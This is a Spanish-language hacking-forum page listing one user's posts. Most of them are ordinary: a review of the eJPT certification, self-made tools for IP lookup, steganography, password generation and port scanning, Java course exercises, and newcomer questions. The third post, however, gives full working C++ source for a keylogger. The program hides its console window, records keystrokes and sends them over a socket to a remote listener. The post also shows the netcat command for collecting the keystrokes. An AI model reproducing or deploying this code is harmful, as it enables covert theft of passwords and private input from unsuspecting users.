Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - Lautaro Villarreal Culic'

Páginas: [1] 2 3
1
Hacking / Mi experiencia con la certificación eJPT + consejos
« en: Julio 16, 2021, 06:57:59 pm »
Buenas underc0ders, quería compartirles mi experiencia con el curso del eJPT (gratuito) y la certificación (200 USD).

El día 13 de Julio por la madrugada obtuve la certificación eJPT, la cual hasta el día de hoy la considero como un primer paso de una serie de certificaciones que tengo planeado seguir.

Esta podemos dividirla en dos partes. La primera es la preparación, esta es opcional, es decir, no es necesario hacerlo para poder rendir el examen, aunque considero que para los que estamos empezando sería una muy buena idea tomar el curso. Ya que es gratuito con el Starter Pass de INE, solo debemos registrarnos https://ine.com/. En cambio la certificación es impartida por eLearnSecurity https://elearnsecurity.com/product/ejpt-certification/, a un costo razonable.



El curso (PTS)
La preparación para el examen se divide en tres partes, Penetration Testing Prerequisites -> Penetration Testing: Preliminary Skills & Programming -> Penetration Testing Basics.

Primera parte


Segunda parte


Tercera parte


Penetration Testing Prerequisites
En esta parte se ve las bases de los protocolos, networking, cookies, routing, etc. Contamos con un lab de Burpsuite, uno de exfiltración de datos, de routing y wireshark.

Debido a que este curso fue hecho en 2015, hay algunas características en herramientas como Burpsuite que no la tenemos hoy en la versión community, como el Spider.

Penetration Testing: Preliminary Skills & Programming
Por otro lado, en la segunda parte veremos (de forma muy básica) programación en C++, Python y Bash.

Las prácticas son muy buenas, aunque si no tenes experiencia en programación puede que se vuelva un poco difícil, ya que tratarás con sockets. En unos de los labs por ejemplo tendrás que hacer un Keylogger en C++.

Penetration Testing Basics
Lo bonito al final y eso INE lo entiende muy bien. En esta última parte veremos metodología de pentesting, escaneos con Nessus, Nmap, enumeraciones, cracking de hashes, explotaciones con Metasploit, google hacking, los verbos HTTP, explotaciones XSS, SQL, etc.

Considero que es muy completa, cada técnica muy bien explicada con su respectiva área de práctica. Teniendo en cuenta que desde hace unos meses este curso está 100% gratuito, no hay nada en lo que se pueda mejorar. Teniendo en cuenta que esta preparación es para personas iniciadas en el Pentesting.

En general...
La duración de este es de 38 horas aproximadamente.

Cada laboratorio contiene un archivo VPN en el que te conectas mediante openVPN con el usuario y clave que INE te proporciona.

Recomiendo tomarlo por más que no le interese hacer la certificación, y más aún si está iniciando en la ciberseguridad (aunque considero que hay mini conceptos que deben conocerse previamente).

El examen (eJPT)
eLearnSecurity es muy generoso con el tiempo de entrega del examen, nos provee 72 horas para responder correctamente un mínimo de 15 preguntas sobre 20. Son preguntas con opciones múltiples de respuesta (multiple choice).

En caso de que les vaya mal no se desanimen porque tendremos una oportunidad de volver a realizar el examen de forma gratuita.

Por más que el examen tenga sus años, todas las herramientas que hoy tenemos actualizadas pueden usarse perfectamente.

El examen puede realizarse con el contenido del curso, no se pondrá en prueba nada que no esté en el PTS.

Tanto INE como eLearnSecurity nos aclaran que no se trata de un CTF, y en cierto modo tienen razón en el caso del examen. Aunque en el PTS parezca que a veces hay que buscarle la vuelta a las soluciones y algunas de estas es difícil de ver en un entorno real (sobre todo en unas de las Black-box labs del final de la tercera parte, donde encontramos credenciales de una base de datos en la respuesta de los Headers).

Algunos consejos
No tengan miedo de ver las soluciones en los laboratorios, estos están hechos para que nosotros aprendamos, no para hacerlo bien a la primera. Hazlos la cantidad de veces que sea necesarias hasta que te quede claro lo que estás haciendo.

  • Lean TODAS las preguntas (y bien) antes de comenzar el examen.
  • Háganse un pequeño .txt con los comandos que usaron en los labs (sobre todo en los últimos 3).
  • Tómate tu tiempo. Si estás atascado ponte a hacer otras cosas y luego vuelve.
  • Asegurate de enumerar bien los hosts y prestar atención a los resultados.
  • Recuerda que para que un pentesting sea exitoso la clave está en recopilar toda la información posible.
  • Si en algún momento tenes la sensación de que algo no tiene sentido, puede que sea lo correcto.

Citar
Claramente esta certificación no hará que te lluevan ofertas de empleo, es más bien una puerta que considero necesario cruzar para seguir con otras certificaciones como el eCPPT, eWPTX, entre otras.

Imagina una escalera de certificaciones, el eJPT es el primer escalón.

Espero que les haya servido, sobre todo si están ingresando al mundo de la ciberseguridad y están buscando algún curso práctico y con un examen  ;D ;D

2
Hacking / Obtener información sobre una IP con zIP
« en: Mayo 27, 2021, 04:13:28 am »


Hola underc0ders, les comparto una mini herramienta que hice hace unos minutos, la herramienta en cuestión lo que hace es hacer una consulta a una API y te muestra los resultados por consola con información acerca de una IP pública.
Está hecho en Python.

Enlace de Descarga:
Descargar desde Drive

GitHub:
Descargar desde GitHub


Saludos!

3
Hacking / Keylogger en c++
« en: Mayo 10, 2021, 02:50:20 am »
Hola muchachos, estoy repasando algunas cosas en C++ enfocado a la seguridad informática en general y me parece una buena idea dejarles el código de un Keylogger muy simple :D

Código: [Seleccionar]
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#pragma comment(lib, "Ws2_32.lib")
#include <iostream>
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>

int main(){

    ShowWindow(GetConsoleWindow(), SW_HIDE);
    char KEY;

    WSADATA WSAData;
    SOCKET server;
    SOCKADDR_IN addr;


    WSAStartup(MAKEWORD(2, 0), &WSAData);
    server = socket(AF_INET, SOCK_STREAM, 0);
    addr.sin_addr.s_addr = inet_addr("IP DEL SERVIDOR"); //IP DEL SERVIDOR (Oyente).
    addr.sin_family = AF_INET;
    addr.sin_port = htons(5555); //Puerto de comunicación.
    connect(server, (SOCKADDR *)&addr, sizeof(addr));


        while(true){
            Sleep(10);
            for (int KEY = 0x8; KEY < 0xFF; KEY++){
               
                if (GetAsyncKeyState(KEY) == -32767){

                        char buffer[2];
                        buffer[0] = KEY;
                        send(server, buffer, sizeof(buffer), 0);
                }
            }
        }

        closesocket(server);
        WSACleanup();
}


EDIT:
Y si se preguntan... ok, pongo mi IP y el puerto está en el 5555. Como veo las pulsaciones?
Pueden hacerlo con netcat.
En linux, escriben el comando
Código: [Seleccionar]
sudo nc -lvp 5555
Y dejan la sesión abierta.

Saludos!

4
Dudas y pedidos generales / [SOLUCIONADO] Atheros 9271 o Ralink 3070?
« en: Febrero 24, 2021, 05:59:24 pm »
Buenas tardes gente, aquellos que la tengan clara en redes y comunicaciones, quiero comprarme un usb wifi, tengo dos en mira.
Uno tiene un chipset Atheros 9271 y el otro un Ralink 3070.
Estuve leyendo que el Atheros 9271 es muy bueno para inyección, modo monitor (para hacer auditorías en general) y el Ralink 3070 me comentan que es lo mismo pero más potente, es esto cierto? en todo caso sería el Ralink 3070 mejor que el Atheros 9271?


Saludos!!

5
Buenas tardes Underc0ders! Hace unas semanas arranqué un proyecto de esteganografía, una rama de la criptografía. Básicamente consiste en el ocultamiento de archivos dentro de algún contenido multimedia generalmente.
El más popular (además de salir en Mr Robot) fue DeepSound, que hace estas cosas pero en lugar de utilizar una imagen para portar la información es a través de archivos de sonidos .wav (si mal no recuerdo).
zStego es una herramienta de esteganografía para el ocultamiento de archivos y textos dentro de una imagen. Programada en .NET con Visual Basic.


Es muy sencillo utilizar zStego, tiene funciones básicas.
Encriptar un archivo (cualquier archivo, con cualquier extensión pero que respete la capacidad para que sea almacenado en la imagen) o un texto a modo de "descripción" del archivo.
En el .zip se encuentra el famoso README agradeciendo a Underc0de y además se encuentra la contraseña generada por zPassword (mi anterior proyecto), esta contraseña sirve para descifrar el texto oculto dentro del .png que se encuentra dentro de la carpeta de zStego.

Les dejo una captura:



A continuación les dejo los links de virus total de los 4 archivos. El .zip la imagen .png el .txt y el .exe

.zip: https://www.virustotal.com/gui/file/1cf2236ec84f653807f1bcbbdd868115a4538688b6a007f6ff3fced36d964ebe/detection
.png: https://www.virustotal.com/gui/file/f1c48d072b819b4b2bdf1ae6346f5c464d092639bca2ab7210e59d78a4386610/detection
.txt: https://www.virustotal.com/gui/file/49751ae099e2b3dd6f6e5ea32bb494da85ec56df8ff86134f6e343f2134862e2/detection
.exe: https://www.virustotal.com/gui/file/f771456b8a7c6d8cb7b67cf07adfefb81125498dd40e4e44b7d1240f9634df4a/detection

Ahora el virustotal del link de descarga directo

https://www.virustotal.com/gui/url/fb8c633d951ba36b6a4e04188600d7af0468e6f362b685d839ae7172d0ea8a2f/detection

LINKS DE DESCARGA

https://drive.google.com/uc?id=15xUwNSHZMaRdKj1xumkqZObSfgLUwlxO&export=download


Unas recomendaciones para evitar problemas:

> Tener .NET Framework 4.6 instalado

La imagen para encriptar debe ser .JPG, dependiendo de su capacidad de encriptado, dependerá el límite de tamaño del archivo que elegimos para encriptar.
Algunas fotografías entregadas por la NASA pueden pesar hasta 300 megas.
Cuando guardemos esta imagen, será en .PNG
Si decidimos compartir la imagen, cuidado. Si este .PNG pasa por alguna red social o es enviada por WhatsApp por ejemplo, esta perderá todo lo que contenga. Ya que cambiará el formato de esta y en muchas ocasiones los metadatos son borrados.
Lo recomendable es enviarla (a la imagen ya encriptada) como archivo, por ejemplo mediante correo electrónico, colocarla en alguna web, pasarla por Bluetooh, etc.
Tampoco servirá si la imagen encriptada .PNG es convertida a .JPG y posteriormente .PNG

En resumen, la imagen no puede perder su formato .PNG ni tampoco deben ser limpiados sus metadatos.

Como ya es de costumbre, a continuación les dejo post de mis anteriores herramientas por si quieren verlos:
zPassword: https://underc0de.org/foro/hacking/curso-de-hacking-desde-0/?prev_next=next
zPort: https://underc0de.org/foro/hacking/conociendo-los-puertos-abiertos-con-mi-zport/
zTool: https://underc0de.org/foro/hacking/les-presento-a-mi-hija-ztool/

Obviamente mis anteriores proyectos tienen errores fatales de programación, la idea es ir mejorando proyecto tras proyecto jajaja  ;D ;D


Muchas gracias a todos!!!

6
Hacking / zPassword - Generador de contraseñas aleatorias
« en: Octubre 02, 2020, 02:04:45 pm »
Buenos días Underc0ders!
Anoche un miembro por el grupo de WhatsApp pasó una captura de un script en python con un generador de contraseñas y me recordó que había hecho uno en Java hace tiempo a medio hacer, era un desastre cuando abrí el proyecto hoy temprano. Así que decidí pasarlo a Visual Basic desde cero y bien hecho  ::)

Es muy simple, y solo se requiere .NET Framework > 4.5.2 (Windows)

Una captura:





VirusTotal:
- URL: https://www.virustotal.com/gui/url/a8755e370a374bc8e1c0d60c914099ed1b3c0b738211eeec056c518c0fd354a1/detection
- ZIP: https://www.virustotal.com/gui/file/f37565dd330de4f3c1c1d9c17f9e11b0ff2dac53d92b2be2519a072b16f797cc/detection


DESCARGA:
https://drive.google.com/u/0/uc?id=12Ict0S6IG0Kr8pG4d6hBzoQOJ-ngLcir&export=download

Que la disfruten!!

PD: Tengo otras dos herramientas publicadas desde hace tiempo en el foro, por si están aburridos péguenle un vistazo
https://underc0de.org/foro/hacking/les-presento-a-mi-hija-ztool/
https://underc0de.org/foro/hacking/conociendo-los-puertos-abiertos-con-mi-zport/

7
Dudas y pedidos generales / Manual para hacer una conexión con VPN
« en: Abril 23, 2020, 01:33:44 am »
Buenas noches comunidad de Underc0de. Estaba averiguando para futuros trabajos, y quería saber si alguien tiene algún post o manual bien hecho (estuve buscando en internet pero la gran mayoría no daban explicaciones técnicas) que tengan por ahí a mano o sepan de su existencia.
Básicamente sería controlar un equipo de manera remota mediante VPN.

Muchas gracias!

8
Dudas y pedidos generales / [SOLUCIONADO] Self-XSS (Duda)
« en: Octubre 01, 2019, 03:49:46 am »
Hola gente de UC!

Tengo una duda con respecto al Self-XSS
Esta vulnerabilidad se da con la consola de los navegadores y tiene algo que ver con el phishing, cierto? Bien.

Ahora, a pesar del CSP (Content Security Privacy) de la página web, en caso de que se logre ejecutar un script de cualquier forma, de la más loca que exista, cualquiera, así sea que yo mismo me inserte un XSS (de ahí viene la palabra Self-XSS) pero con la consola del navegador, es decir, le damos a inspeccionar elementos y abrimos la consola..


Se considera una vulnerabilidad?
Ya que si por ejemplo colocamos <script>alert(1)</script>
al menos a mí, me da un error (Uncaught SyntaxError: Unexpected token <)

A todo esto, se supone que el CSP debe proteger de XSS, al menos, tiene una protección contra scripts. A lo que voy y para terminar me refiero,
la consola de un navegador, puede ser una herramienta de hacking? (al menos en este caso?).

Saludos.

9
Debates y Reviews / [SOLUCIONADO] Introducción al BugBounty / BugHunter
« en: Agosto 22, 2019, 09:26:19 pm »
Hola gente linda de la comunidad. Verán, no es nada técnico, o quizá sí.

Estoy por comenzar a darle duro al bugbounty o bughunter, como le llamen con Hackerone, estoy estudiando y no tengo un horario muy flexible que digamos, por lo que hay días en los que necesito que el día dure 80 horas y otros en los que estoy totalmente disponible, quiero usar eso para esto. En fin, al grano.

Considero que no me vendría nada mal que alguien del foro con experiencia en este campo pueda darme (no solo a mí, seguro hay más personas que están en la misma situación que yo) consejos, técnicas, tips, observaciones, etc.
Como por ejemplo, por dónde creen que es viable comenzar, cómo elegir un programa o un objetivo (por ejemplo en la lista de empresas en hackerone, cuál sería la más conveniente).
A la hora de decir "bueno, voy a elegir XXXXXX empresa que tiene este lindo programa de recompensa, empezaremos por....................." o algo similar y decir "elegí XX empresa con este programa y ya sé que es inútil hacer "esto" porque....".

No sé si me explico. Mi caso es que no sé por dónde empezar, qué tipo de vulnerabilidades suelen buscar, dónde, con qué....
Como si dijera... "bueno, si, leí este programa de esta organización así que manos a la obra.......... *5 minutos después* y ahora qué? (ya sé... si... y ahora a buscar vulnerabilidades. Pero, por dónde empezar?)".


Cualquier tipo de aporte que crean oportuno por más que yo no haya mencionado  nada al respecto sirve muchísimo.


Muchas gracias!!!

10
Maltego es una herramienta de minería de datos interactiva que presenta gráficos dirigidos para el análisis de enlaces. La herramienta se utiliza en las investigaciones en línea para encontrar relaciones entre piezas de información de varias fuentes ubicadas en Internet.

Este software permite crear entidades personalizadas, lo que le permite representar cualquier tipo de información además de los tipos de entidades básicas que forman parte del software. El enfoque básico de la aplicación es analizar las relaciones del mundo real (redes sociales y nodos de redes informáticas) entre personas, grupos, páginas web, dominios, redes, infraestructura de Internet y afiliaciones con servicios en línea como Twitter y Facebook. Entre sus fuentes de datos se encuentran los registros DNS, los registros whois, los motores de búsqueda, las redes sociales en línea, varias API y diversos metadatos.
Es utilizado por investigadores de seguridad e investigadores privados.


Instalación de Maltego en dos sencillos pasos para Debian 9, Ubuntu, MX Linux y Linux Mint:


Primero lo descargamos
Código: [Seleccionar]
wget https://www.paterva.com/malv423/Maltego.v4.2.3.12223.deb



Y por último lo instalamos
Código: [Seleccionar]
sudo dpkg -i Maltego.v4.2.3.12223.deb



Por útltimo escribimos "maltego" en la consola y se abre la herramienta.




Cualquier duda me avisan.

11
Hacking / Herramientas de ciberseguridad para Android [Pengodroid 3]
« en: Mayo 14, 2019, 08:37:35 pm »
Pengodroid es un repositorio de aplicaciones y apk's para dispositivos android.


Nos ofrece nuevas tools, todo actualizado hasta noviembre del 2017, mientras que hay algunos APK que no se pueden actualizar mas, por discontinuadas o aplicaciónes abandonadas (pero son necesarias), aunque igualmente funcionan. Todas las aplicaciones fueron probadas en versiones de 4.0 para arriba de Android, tanto en celulares como en tablets.
Dentro del repositorio, hay unos listados con todas las herramientas disponibles, y con los links originales de la URL original de la herramienta, para que puedan estar al tanto de donde buscarla y actualizarla en caso de ser necesario. Se añadieron las URLs originales de los creadores de las herramientas, en caso de estar disponibles.


Abajo de todo de la web, encontrarán los 6 links para la descarga de todas las herramientas.
Más información (y links de descarga): https://pengowin.com.ar/pengodroid3.html

12
Hola gente. Tengo pensado dejar Windows e instalar Linux de base. Estuve viendo todas las herramientas que utilizo y en el 90% de los casos hay manera de instalar lo que uso en Windows. En este caso, no encontré forma de instalar el IDE de visual Studio. Ojo, visual Studio. Porque visual Studio code si hay forma. Pero el visual studio (IDE) no pude encontrar manera.

Ustedes saben? Gracias

13
Hacking / Conociendo los puertos abiertos con mi zPort
« en: Mayo 08, 2019, 01:41:54 am »
Hola underc0ders! A principio de año les presenté mi primera herramienta, zTool: https://underc0de.org/foro/hacking/les-presento-a-mi-hija-ztool/

Desafortunadamente, zTool nunca llegó a ser lo que realmente quise, pero hoy les traigo partes de lo que necesitaba zTool. Se llama, zPort.
Un escaner de puertos totalmente simple (y para nada perfecto).



Bien, ahora unos consejos que les dejo para usar zPort  :-[

IMPORTANTE: Ejecutar zPort como administrador.

MODO DE USO:
En lugar de usar una IP pública de una web, se debe usar la url.
Por ejemplo, la IP de lautaroculic.com es 185.201.11.151

En el escaner, se debe colocar la url sin www ni http:// (como se ve en el ejemplo de la imagen que coloqué en el post)
Con respecto a los puertos filtrados, estos figurarán como cerrados por defecto, o largará un código de error distinto.
Para hacer un escaneo en la red privada, zPort solo tiene permitido hacer la búsqueda en el host en
el que se está ejecutando. Puede colocar localhost o la ipv4 del host en el que esté corriendo
el programa.

ADVERTENCIA: Si manda muchas solicitudes a una página web, es probable que se bloquee tu IP pública
temporalmente para esa web. Evítelo.



Requisitos mínimo de sistema:

> 512Mb de RAM
> Intel Core i3 6ta generación (un i3 de 7ma generación trabaja a un 50%)
> .Net Framework 4.7.2 (está dentro del .rar para que puedan instalarlo si lo desean)

---------

Con respecto a virus total:

> Leeme: https://www.virustotal.com/es-ar/file/7d089866356290aae6819ba9cb4cf83d8aa89a0247cf506e718bf962865672b8/analysis/1557290246/
> puntoNET472: https://www.virustotal.com/es-ar/file/4e49c56e4cf9df2e837a8a3010f5a8b4deb096429d56e7fd9ff70ab394663678/analysis/
> zPort: https://www.virustotal.com/es-ar/file/4501d26e632817f8fb25d32f18087c7282d21530d30b503983c3d122e6c54904/analysis/1557290237/
> Archivo RAR: https://www.virustotal.com/es-ar/file/d59fd2976baaf52029956f5dd164e57a0bd32586b6b12598bbedfab413d48a42/analysis/1557290189/
> URL de descarga: https://www.virustotal.com/es-ar/url/9e63da0dabb6f315a69d658d400d0fa74634529b4d6becba1b693b05bc1647b4/analysis/1557290471/
---------

Y por último, la descarga directa a zPort:

> http://www.mediafire.com/file/87ibfnqd6cvoaoq/zPort-TODO.rar/file


Les agradecería si me dijesen qué tal les parece la herramienta y cómo funciona.

14
Hola, buenas noches.
Estoy desarrollando una herramienta para hacer un escaneo de puertos y a la hora de ejecutar el escaneo en el localhost no hay ningún problema, pero cuando
quiero analizar una IP pública, por ejemplo, me larga el error de que hay poco espacio de almacenamiento en el buffer y automáticamente se cierra
el programa que está en ejecución.

¿Hay alguna forma de agrandar la capacidad al buffer, o evitar que ocurra este error?

Adjunto imágenes del error:



------------------------------------------




La versión en la que estoy desarrollando el programa es .NET 4 y uso el Visual Studio 2019.

Gracias.


15
Hola gente qué tal, cómo andan.
Como verán (https://underc0de.org/foro/hacking/les-presento-a-mi-hija-ztool/) hice una herramienta. La cual ya está terminada.
Mi idea es comenzar a redistribuirla en foros y demás. De momento se encuentra en Underc0de, elhacker y en uptodown se encuentra en proceso de revisión.

Me gustaría que me nombren sitios donde pueda dejar mi herramienta y así se distribuye más y llega a más gente.

Saludos

16
Hacking / Les presento a mi hija, zTool.
« en: Enero 08, 2019, 03:21:51 am »
Hola Underc0ders!!!! qué tal. Les presento mi primer Software, zTool. Es un proyecto estudiantil de mi universidad que llevé a cabo todo el año pasado hasta el día de hoy y que a mediados de febrero será la presentación.

Espero que les guste, si encuentran algún error, por favor díganmelo (hay operaciones en la que tarda hasta dos minutos, no es que la herramienta se cuelga, sino que está trabajando y no logré colocar un progress bar por falta de tiempo).
Para quien les interese, está hecho totalmente en Java.
Será una herramienta simple para auditar redes y tener una administración más amplia de la red privada en la que estemos conectados. Se enfoca a un kit de herramientas de trabajo con IP (Calculadora IP, hosts en la red, conversión de URL a IP, etc). Este software es de uso libre y gratuito para el sistema operativo Windows.

Por favor, comenten qué les pareció.
Desafortunadamente, hay mejoras que podría colocar (progress bar). Pero aún no hice la documentación y tengo un mes para hacerla, la cual ando ajustado de tiempo. Por lo que esto será la versión final.
Como futuro desarrollador profesional, esto me hace mucha ilusión, y terminar de compilarlo y configurar el setup hoy, subirlo y que sea instalado en sus ordenadores es un empujón enorme de motivación que a muchos a veces nos hace falta.

Gracias por el apoyo y nos vemos pronto con nuevos aportes!!


LINK: http://www.mediafire.com/file/u36wxne4u13p8aw/zTool-setup.exe/file


ALGUNAS IMÁGENES:



---



---



---



---



---



---





17
Java / Eventos e Interfaz gráfica (NetBeans) - Unidad 5
« en: Septiembre 13, 2018, 01:36:25 am »
Acá hay muchísimos. Muchísimos ejercicios para que hagan. Por lo menos unos 28
Son 4 proyectos. El proyecto "Uni5_Ejercicios_2" está vinculado con el documento de Word, por las dudas...
Bien, acá ya metemos las manos en la masa y empezamos a jugar con los formularios de NetBeans. Hay ejercicios con Combo Box, JList, Botones por doquier, y muchas cosas más con muchísimos eventos.

DOCUMENTACIÓN:
>http://www.mediafire.com/file/eu3yyipz8i7k7w8/UNIDAD_5_SWING.pdf/file
>http://www.mediafire.com/file/vvmlvymhv9lmihj/Segunda_parte-DOC_EJERCICIOS.docx/file

EJERCICIOS RESUELTOS:
>http://www.mediafire.com/file/isovwajeradm6gp/Pr%25C3%25A1cticas_5.rar/file

Recuerden que lo que hay dentro del .rar son los proyectos. Estos se abren dentro de NetBeans.
Pronto sigo subiendo más unidades. De momento tengo solo esas, saludos!

18
Java / Todo acerca del String/cadenas - Unidad 4
« en: Septiembre 13, 2018, 01:28:51 am »
Gente, en esta unidad veremos muchas funciones como el equals para trabajar con las cadenas de texto. Como en anteriores post mencioné, tendrán la documentación con ejercicios sin resolver y además tales ejercicios hechos por mí para que puedan compararlos.

DOCUMENTACIÓN:
>http://www.mediafire.com/file/q3of9jaqlajb3f2/UNIDAD_4__CADENAS.pdf/file

EJERCICIOS RESUELTOS:
>http://www.mediafire.com/file/z2qtct55jcbr0h8/Pr%25C3%25A1cticas_4.rar/file

Saludos!

19
Java / Clases, objetos y herencias - Unidad 3
« en: Septiembre 13, 2018, 01:23:53 am »
Continuando con la serie de unidades de mi carrera, en este post nos encontraremos con bastantes ejercicios de herencia. Un lío de proyectos y paquetes también. Así que intenté acomodarlo como pude. El .rar está con 5 proyectos donde hay ejercicios de herencia resueltos para que los compares con los que están en el .pdf sin resolver.

DOCUMENTACIÓN:
>http://www.mediafire.com/file/9ga0aq4ct0qtupl/UNIDAD_3_CLASES_Y_OBJETOS_HERENCIA.pdf/file

EJERCICIOS RESUELTOS:
>http://www.mediafire.com/file/rbxw3g2r6tw32qk/Pr%25C3%25A1cticas_3.rar/file


Saludos! Si tienen alguna duda acerca de java, a la sección de dudas. Si es algo de lo que deba hacerme responsable, comentalo.

20
Java / Tipos de datos y estructuras de control (arreglos) - Unidad 2
« en: Septiembre 13, 2018, 01:16:23 am »
Bien, esta sería el post que le sigue al post anterior xd Por lo que ya saben la temática..
En esta unidad se verá los tipos de datos y los arreglos. Con algunos ejercicios que pueden resolver, y, además, estará mi proyecto con los ejercicios ya resueltos (quizás alguno ande mal, pero bueno).


DOCUMENTACIÓN:
> http://www.mediafire.com/file/lc0ubi47eubf325/UNIDAD_2_TIPOS_DE_DATOS_Y_ESTRUCTURAS_DE_CONTROL-_ARREGLOS...pdf/file

EJERCICIOS RESUELTOS:
>http://www.mediafire.com/file/gu0olvnr8vxrxcj/Pr%25C3%25A1ctica_2.rar/file

Saludos :)

Páginas: [1] 2 3